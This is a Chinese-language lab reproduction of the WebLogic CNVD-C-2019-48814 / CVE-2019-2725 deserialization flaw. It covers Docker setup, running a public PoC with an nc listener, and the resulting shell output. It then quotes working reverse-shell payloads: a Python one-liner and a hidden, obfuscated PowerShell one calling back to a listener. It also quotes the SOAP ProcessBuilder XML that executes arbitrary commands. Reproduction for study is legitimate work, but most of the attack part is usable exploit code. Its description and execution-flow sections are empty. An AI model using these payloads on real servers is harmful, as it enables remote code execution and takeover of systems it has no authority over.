CNVD

docker搭建环境:

1
2
3
4
5
6
docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
http://localhost:49163/console
User: weblogic
Pass: welcome1

漏洞验证:登入->http://xx.xx.xx.xxx:49163/_async/AsyncResponseService

若出现如上述页面则可确定漏洞基本存在

poc:https://github.com/fuhei/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.py
验证方式:
在攻击机开启本地监听,nc -lvvp 2333
调用脚本:

1
python poc.py -l 192.168.10.144 -p 2333 -r http://192.168.10.145:49163

这里似乎如果将监听地址写为127.0.0.1是不行的,只能改为在内网中的地址,拿到shell

listening on [any] 2333 …
192.168.10.145: inverse host lookup failed: Unknown host
connect to [192.168.10.144] from (UNKNOWN) [192.168.10.145] 36844
sh: no job control in this shell
sh-4.2$ whoami
whoami
oracle
sh-4.2$ ls
ls
autodeploy
bin
common
config
console-ext
derby.log
fileRealm.properties
init-info
lib
nodemanager
security
servers
startWebLogic.sh
sh-4.2$

漏洞描述:

poc分析:

1
def __init__(self, check, rhost, lhost, lport, windows):

url检查,测定漏洞点存在与否
目标地址,监听地址和端口
windows则是检查目标的操作系统,默认为unix,若为windows则要添加参数
unix或linux下的shell生成方式:

1
2
3
4
5
self.cmd_payload = (
"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket."
"SOCK_STREAM);s.connect(("{lhost}",{lport}));os.dup2(s.fileno(),0); os.dup2("
"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"
).format(lhost=self.lhost, lport=self.lport)

windows下shell生成:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
self.cmd_payload = (
r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) "
r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +""
r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a"
r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"
r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"
r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;"
r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)"
r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;"
r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};"
r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if "
r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne"
r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e."
r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};"

exp部分:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def get_process_builder_payload(self):
process_builder_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>'''
return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),
cmd_payload=self.cmd_payload)

执行的具体流程:

分析参考:
https://paper.seebug.org/909/#417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725
http://pupiles.com/xmldecoder.html

复现参考:
https://www.o2oxy.cn/2204.html